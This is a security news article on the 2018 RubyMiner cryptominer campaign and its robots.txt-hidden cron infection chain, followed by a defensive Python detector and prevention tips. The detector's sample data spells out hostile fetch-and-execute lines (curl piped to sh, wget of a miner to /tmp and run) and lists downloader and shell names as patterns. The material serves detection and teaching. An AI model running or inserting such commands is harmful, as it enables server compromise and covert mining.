Malware | 01/17/2018

RubyMiner Malware Targets Windows and Linux Servers


Security researchers have disclosed a new strain of malware, named RubyMiner, that primarily targets outdated Linux and Windows web servers. RubyMiner is a cryptocurrency miner: on compromised systems it installs a modified version of the open-source XMRig Monero miner.

What is RubyMiner?

According to Check Point researchers, the attack began on January 9-10, 2018, and within 24 hours 30% of networks worldwide had seen compromise attempts by the malware.

The attackers use the passive fingerprinting tool p0f to identify outdated Windows and Linux web servers. Security firm Certego also reported a sharp spike in Ruby on Rails exploitation attempts over HTTP starting January 10th.

The most-targeted countries include the United States, Germany, the United Kingdom, Norway and Sweden. Researchers observed attacks against PHP, Microsoft IIS and Ruby on Rails web servers.

Once a vulnerable server is identified, the attacker exploits multiple known web server vulnerabilities to inject malicious code into the outdated system.

“XMRig usually sends a donation of 5% of the revenue gained from the mining process to the code’s author. Nevertheless, even this amount was too much for the attacker to part with as that ‘donation element’ was deleted from the code, giving the enthusiast 100% of the profit,” the post published by Check Point said.


Attackers target both Linux and Windows servers

The RubyMiner group uses the passive fingerprinting tool p0f to scan for and identify Linux and Windows servers running outdated software. Once they have located unpatched servers, the attackers deploy well-known exploits to gain a foothold and infect them with RubyMiner.

Attackers hide malicious code in robots.txt files

In a report published last week, Check Point broke down RubyMiner's infection routine on Linux systems, based on data collected from its honeypot servers. Several details stand out, not least for the attackers' creativity:

  1. The exploit payload is a series of shell commands
  2. The attackers clear all existing cron jobs
  3. They add a new hourly cron job
  4. The new cron job downloads a script hosted online
  5. That script is hidden inside the robots.txt file of various domains
  6. The script downloads and installs a modified version of the legitimate XMRig Monero miner
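The infection chain above leaves two host-side traces that are easy to hunt for. The following Python script is an added example, not Check Point's tooling or code from the campaign: it scans crontab text for jobs that download remote content and pipe it to a shell (flagging hourly ones and any that fetch a robots.txt), and it checks a robots.txt body for lines that are neither directives nor comments, which is where the attackers hid their script. The crontab, the robots.txt content and the example.invalid host are constructed sample input; the robots.txt field allow-list is an assumption you should extend for your own sites.

```python
import re

# Constructed sample crontab (not from the page or a real infection).
# The third job is the pattern the article describes: an hourly entry that
# fetches a script hidden in a robots.txt and pipes it straight to a shell.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
0 * * * * curl -s http://example.invalid/robots.txt | sh
*/15 * * * * /usr/bin/php /var/www/app/cron.php
"""

# Constructed robots.txt body: two real directives followed by a shell script.
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /admin
#!/bin/sh
wget -q http://example.invalid/miner -O /tmp/m && chmod +x /tmp/m && /tmp/m
"""

DOWNLOADERS = {"curl", "wget", "fetch"}
SHELLS = {"sh", "bash", "dash", "ksh", "zsh"}
# Field names a legitimate robots.txt may contain (assumed allow-list; extend
# it if your sites use other extensions).
ROBOTS_FIELDS = {"user-agent", "disallow", "allow", "sitemap", "crawl-delay", "host"}


def parse_crontab(text):
    """Yield (schedule, command) for each job line; skips comments and
    environment assignments such as MAILTO=root."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue
        yield " ".join(parts[:5]), parts[5]


def is_hourly(schedule):
    """True for 'M * * * *' schedules, i.e. once every hour at minute M."""
    minute, hour, dom, mon, dow = schedule.split()
    return minute.isdigit() and (hour, dom, mon, dow) == ("*", "*", "*", "*")


def _program_names(command):
    """First word of every pipeline/sequence segment, without its path."""
    names = []
    for segment in re.split(r"\s*(?:\||;|&&)\s*", command):
        words = segment.split()
        if words:
            names.append(words[0].rsplit("/", 1)[-1])
    return names


def is_fetch_and_exec(command):
    """True when a command downloads remote content and hands it to a shell."""
    names = set(_program_names(command))
    return bool(names & DOWNLOADERS) and bool(names & SHELLS)


def suspicious_cron_entries(text):
    """Return [(schedule, command, [reasons])] for entries worth a look."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = []
        if is_fetch_and_exec(command):
            reasons.append("downloads remote content and executes it")
        if "robots.txt" in command:
            reasons.append("fetches a robots.txt, which should hold no commands")
        if reasons and is_hourly(schedule):
            reasons.append("runs hourly")
        if reasons:
            findings.append((schedule, command, reasons))
    return findings


def robots_non_directive_lines(text):
    """Return lines of a robots.txt that are neither 'Field: value' directives
    nor comments.  A shebang is flagged even though it starts with '#'."""
    flagged = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#!"):
            flagged.append(line)
            continue
        if line.startswith("#"):
            continue
        field, sep, _ = line.partition(":")
        if not sep or field.strip().lower() not in ROBOTS_FIELDS:
            flagged.append(line)
    return flagged


if __name__ == "__main__":
    for schedule, command, reasons in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"cron [{schedule}] {command}\n    " + "; ".join(reasons))
    for line in robots_non_directive_lines(SAMPLE_ROBOTS):
        print(f"robots.txt: non-directive content: {line}")
```

Feed it the output of `crontab -l` for each user plus the files under /etc/cron.* and /var/spool/cron, and the robots.txt of any domain a flagged job contacts. Step 2 of the chain, the wiped crontab, can only be spotted against a baseline of the jobs a host is supposed to have, which this script does not keep.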

Check Point security researcher Lotem Finkelstein said the team has seen attackers target Windows IIS servers, but has not yet been able to obtain a copy of the Windows version of the malware. Notably, one of the domains the attackers used to hide malicious commands in a robots.txt file was also used in a previous malware campaign. That earlier campaign used the same Ruby on Rails exploit seen in the RubyMiner attacks, suggesting the same group is most likely behind RubyMiner.

Over the past week, a single attacker attempted to exploit 30% of all networks worldwide in search of vulnerable web servers to recruit into his mining pool.

Among the top countries targeted are the United States, Germany, the United Kingdom, Norway and Sweden, though no country has gone unscathed. As virtual currencies have grown in popularity and value, the methods for mining them have multiplied as well. In 2017, using everyday websites to mine various cryptocurrencies became common, with thousands of them used for their CPU power. Entering 2018, attackers are again attempting to recruit any available machine for the sole purpose of profit.

What began as a minor annoyance has turned into a major wave of attack attempts across the globe: attackers are no longer satisfied with personal computers and are now targeting powerful web servers to increase their computational resources.

The attacker chose to exploit multiple vulnerabilities in HTTP web servers to distribute the open-source Monero miner XMRig. As noted above, the attacker stripped out the miner's built-in developer donation rather than merely lowering it. XMRig normally lets the operator reduce that donation percentage through its donate-level setting, so a build with the donation code removed entirely is a sign of a deliberately modified binary when a recovered sample is examined.


Tips to prevent RubyMiner from reaching your systems:

1. Patch the web stack: RubyMiner reaches servers through well-known exploits against outdated Ruby on Rails, PHP and IIS deployments, so keep the web server, application framework and their dependencies current, and decommission versions that no longer receive fixes.

2. Keep your Windows updated: to avoid such infections, keep the operating system updated through automatic Windows Update. Outdated versions of Windows are an easy target, and the same applies to Linux distributions that have passed end of life.

3. Audit scheduled tasks: on Linux the infection wipes the existing crontab and installs an hourly job that downloads a script. Review cron entries (and Scheduled Tasks on Windows) for jobs you did not create, especially ones that fetch remote content and pass it to a shell.

4. Regular backup: regular, periodic backups keep your data safe if a system is compromised, so back up important files to a cloud drive or an external hard drive.

5. Always have an antivirus: precaution is better than cure. Run a reputable antivirus or anti-malware product and keep its signatures current. Sustained, unexplained CPU load on a server is also a practical sign that a miner is running.

6. Browser-side precautions: a popup blocker, an ad blocker for Chrome, Firefox or IE, and avoiding freeware sites that bundle extra software protect workstations against browser-delivered miners and bundled malware, but they do nothing against the server-side exploit path described in this article.
